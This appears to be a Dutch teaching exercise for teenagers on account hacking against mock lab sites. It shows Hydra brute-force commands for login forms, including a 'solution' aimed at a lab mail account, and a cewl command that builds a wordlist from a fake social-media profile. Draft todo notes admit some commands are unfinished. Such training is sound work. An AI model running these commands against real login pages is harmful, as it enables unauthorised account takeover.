# Account hacken

## Kan je het raden?

Ga naar [guess.security4teens.nl](http://guess.security4teens.nl) en kijk of je de top 25 van de wachtwoorden uit 2017 kan raden.

## Dat kan vast slimmer

Inderdaad, we kunnen een programma voor ons laten gokken. Gelukkig hoeven we zullen programma's niet zelf te schrijven maar zijn er anderern die hiervoor programma's hebben geschreven. Een van dat soort programma's is Hydra.

```
hydra guess.security4teens.nl http-post-form "/password/guess:password=^PASS^:Blaat" -l none -P /etc/share/wordlists/rockyou.txt.gz -t 20 -w 5 -V
```

## En nu op een account

Ga naar [mail.security4teens.nl](http://mail.security4teens.nl) en kijk of je bewapend met het tooltje van hierboven kan inloggen op het mail account van k.mitnick@thehackacademy.nl

## Ok, hij heeft geen "bekend" wachtwoord

We weten dat ons doelwit graag wachtwoorden gebruikt die hij makkelijk kan onthouden. We kunnen er dus bijna wel vanuit gaan dat deze op zijn facebookpagina staan.

Ga naar [facebook.security4teens.nl](http://facebook.security4teens.nl) en kijk of je het wachtwoord kan achterhalen voor het account wat we proberen te kraken.

## Dit gaat niet werken

Gelukkig kunnen we hier ook de computer voor gebruiken en kunnen we een lijst laten genereren van (de tekst op) een webpagina.

```
cewl -w wordlist.txt -m 7 facebook.security4teens.nl
```

Lukt het je nu met alle opgedane kennis?


## Todo's

* cewl werkt alleen op de full-url (de facebook app doet een js-redirect die niet werkt)
* het hydra command (ook voor guessen?) is niet sluitend denk ik; zeker voor de mail-app moet er gesleuteld worden aan form-post var names en de check-if-invalid string matcher
* het mail adres wat gebruikt moet worden consistent maken (ook @security4teens.nl?)

Werkende hydra commando (oplossing)
```
cewl -w wordlist.txt -m 7 facebook.security4teens.nl/www.facebook.com/.... #full url na js-redirect
hydra mail.security4teens.nl http-post-form "/:username-email=^USER^&password=^PASS^&submit=Login:Oh snap" -l k.mitnick@thehackacademy.nl -P wordlist.txt -t 20 -w 5 -V 
```